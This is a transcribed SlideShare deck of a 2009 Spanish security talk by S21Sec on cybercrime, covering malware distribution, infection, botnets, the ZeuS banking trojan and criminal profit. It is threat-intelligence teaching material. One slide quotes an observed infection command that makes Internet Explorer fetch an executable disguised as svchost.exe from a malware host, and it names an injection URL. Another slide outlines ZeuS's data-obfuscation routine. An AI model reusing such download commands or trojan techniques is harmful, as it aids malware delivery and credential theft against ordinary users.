Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Cibercrimen Fraude Y Malware Mikel Gastesi

4,915 views

Published on

Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.

Published in: Technology, News & Politics
  • Be the first to comment

Cibercrimen Fraude Y Malware Mikel Gastesi

  1. 1. *[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz mgastesi@s21sec.com Fecha: 10-07-2009
  2. 2. Confidencialidad La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización. Pág. 2
  3. 3. Índice Introducción - ¿Cibercrimen? Evolución Distribución Infección Botnets • ZeuS/Zbot Money, money, money Pág. 3
  4. 4. INTRODUCCIÓN - ¿CIBERCRIMEN? Pág. 4
  5. 5. ¿CIBERCRIMEN?
  6. 6. EVOLUCIÓN (de la mentalidad)
  7. 7. EVOLUCION 1 persona • Ataques dirigidos • Recursos limitados Grupos profesionales • Ataques indiscriminados/masivos • Muchos recursos técnicos
  8. 8. EVOLUCIÓN Cambio de objetivos Inicios: Ataques al servidor • Necesidad de pocos recursos • Mayor conciencia de seguridad Ahora: Ataque a los clientes • Necesidad de manejar mucha información • Necesidad de una infraestructura tecnológica • Poca conciencia de seguridad
  9. 9. EVOLUCIÓN 1 servidor • Búsqueda de vulnerabilidades • Atacante trata de acceder al servidor N clientes • Vulnerabilidades conocidas • Victima accede al vector de infección • ¿Phishing? → Malware!!!
  10. 10. DISTRIBUCIÓN
  11. 11. DISTRIBUCIÓN El malware acude a la víctima • SPAM • Búsqueda y robo de contactos • P2P • Ingeniería social • Descargas con “regalo”
  12. 12. EJ. SPAM
  13. 13. EJ. SPAM
  14. 14. DISTRIBUCIÓN La víctima acude al malware • Páginas fraudulentas • Falsos antivirus • Falsas páginas de vídeos • Páginas comprometidas • Páginas legítimas atacas indiscriminadamente
  15. 15. EJ. FAKE AV
  16. 16. EJ. FAKE AV
  17. 17. DISTRIBUCIÓN Página comprometida, ¿cómo? • Nine ball: 40000 páginas comprometidas • Cuentas FTP • Diccionario/Brute force • SQL injection • RFI • Exploits recientes, 0-days
  18. 18. SQL INJECTION MASIVO
  19. 19. INFECCIÓN
  20. 20. INFECCIÓN
  21. 21. INFECCIÓN Software vulnerable • Sistema Operativo • Navegador • Complementos • Flash • PDF... TODO programa que interactúe con el exterior es una POSIBLE víctima.
  22. 22. UNAS ESTADÍSTICAS... [secunia]
  23. 23. INFECCIÓN
  24. 24. INFECCIÓN Víctima “vulnerable” • Ejecución de ficheros adjuntos • Doble extensión (.doc______.exe) Confianza en la página • Codecs No siempre se está a salvo teniendo todo el software actualizado • 0-days • Ventana de tiempo de los antivirus
  25. 25. INFECCIÓN Microsoft DirectShow 0-day (msvidctl.dll) • Páginas comprometidas • Inyecta 8oy4t.8866.org/aa/go.jpg • Muchos exploits, entre ellos el 0day • 2000, 2003 y XP vulnerables • Ejecuta: C:[%programfiles%]Internet Exploreriexplore.exe "http://milllk.com/wm/svchost.exe" • Detectado por solamente por 2 AV (VirusTotal) • Por ahora, v0.1 http://www.securityfocus.com/bid/35558 http://www.csis.dk/en/news/news.asp?tekstID=799 http://www.microsoft.com/technet/security/advisory/97 2890.mspx
  26. 26. INFECCIÓN La cadena es tan fuerte como el eslabón más débil
  27. 27. BOTNETS
  28. 28. BOTNETS
  29. 29. BOTNETS
  30. 30. BOTNETS Uso: • Proxy • Ataques DdoS • Obtención de credenciales • Hosting • SPAM • Supercomputadora • ...
  31. 31. BOTNETS No solo PCs Botnets ocultas tras Bullet-proof ISP • No responden a avisos de abuso • Alojan paneles de control • Alojan vectores de infección y malware • Fraudulento
  32. 32. TROYANOS BANCARIOS - ZeuS
  33. 33. TROYANOS BANCARIOS Silenciosos Distribución masiva Botnet Robar credenciales MitB ¿Por qué no más? ¡Es gratis! • Control de la máquina • Proxy • … Programado por humanos • Parámetros • Idioma, user-agent...
  34. 34. TROYANOS BANCARIOS Actores • Sinowal • Torpig • Buena ocultación • Generación de dominios mediante algoritmo • Arrestos • BankPatch • MitB • ZeuS • Más sencillo • Ocultación user-mode • ¡El rey del mambo!
  35. 35. ZEUS Finales 2006 • Simple bot • ~3000$ Principios 2007 • Se hace popular • ~700$ Finales 2007 • Versiones personalizadas Mediados 2008 • Vulnerabilidades • Implementaciones en paralelo 2009 • Vulnerabilidades corregidas • Soporta parcialmente IPv6...
  36. 36. ZEUS – CAMBIOS IMPORTANTES Corrección de bugs • Mal saneamiento de parámetros • Escritura de ficheros • ¡Guerra! 10-12-2008 → RC4 • Local data requests to the server and the configuration file can be encrypted with RC4 key depending on your choice
  37. 37. ZEUS
  38. 38. ZEUS Distribución • SPAM • Facturas • E-cards • Michael Jackson • Kits de exploits
  39. 39. ZEUS - CARACTERÍSTICAS Bot Actualización configuración Actualización del binario /etc/hosts Socks proxy Inyección HTML Redirección HTML Capturas de pantalla Capturas de teclados virtuales Captura de credenciales Robo certificados KillOS
  40. 40. ZEUS - TODO Compatibility with Windows Vista and Windows 7 Improved WinAPI hooking Random generation of configuration files to avoid generic detection Console-based builder Version supporing 64 bit processors Full IPv6 support Detailed statistics on antivirus software and firewalls installed on the infected machines
  41. 41. ZEUS
  42. 42. ZEUS - FICHEROS 1.0.x.x • ntos.exe • wnspoemaudio.dll • wnspoemvideo.dll … … 1.2.x.x • sdra64.exe • lowseclocal.ds • lowsecaudio.ds ¿1.3.x.x? • bootwindows.exe • skype32win32post.dll • skype32win64post.dll
  43. 43. ZEUS
  44. 44. ZEUS
  45. 45. ZEUS Config file: • Cifrado con RC4 • Update binary • Url C&C server • Advanced configuration • Webfilters • WebFakes • WebInjects
  46. 46. ZEUS Ficheros de datos • Cifrado RC4 al servidor • Cifrado. For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
  47. 47. ZEUS - C&C
  48. 48. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  49. 49. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  50. 50. Zeus – C&C Opciones • Botnet : Bots online • Botnet : Comandos remotos • Logs : Búsqueda • Logs : Ficheros subidos • System : Perfil • System : Opciones
  51. 51. ZEUS
  52. 52. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  53. 53. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  54. 54. MONEY, MONEY, MONEY
  55. 55. LUCRO Crear malware y venderlo Crear botnet y alquilarla Obtención de credenciales y venderlas Obtención de dinero gracias a las credenciales
  56. 56. LUCRO
  57. 57. LUCRO
  58. 58. LUCRO
  59. 59. LUCRO
  60. 60. LUCRO Transferencias Compra de bienes • Físicos • Virtuales Subastas ...deja volar tu imaginación
  61. 61. *[ MUCHAS GRACIAS ] Pág. 61

×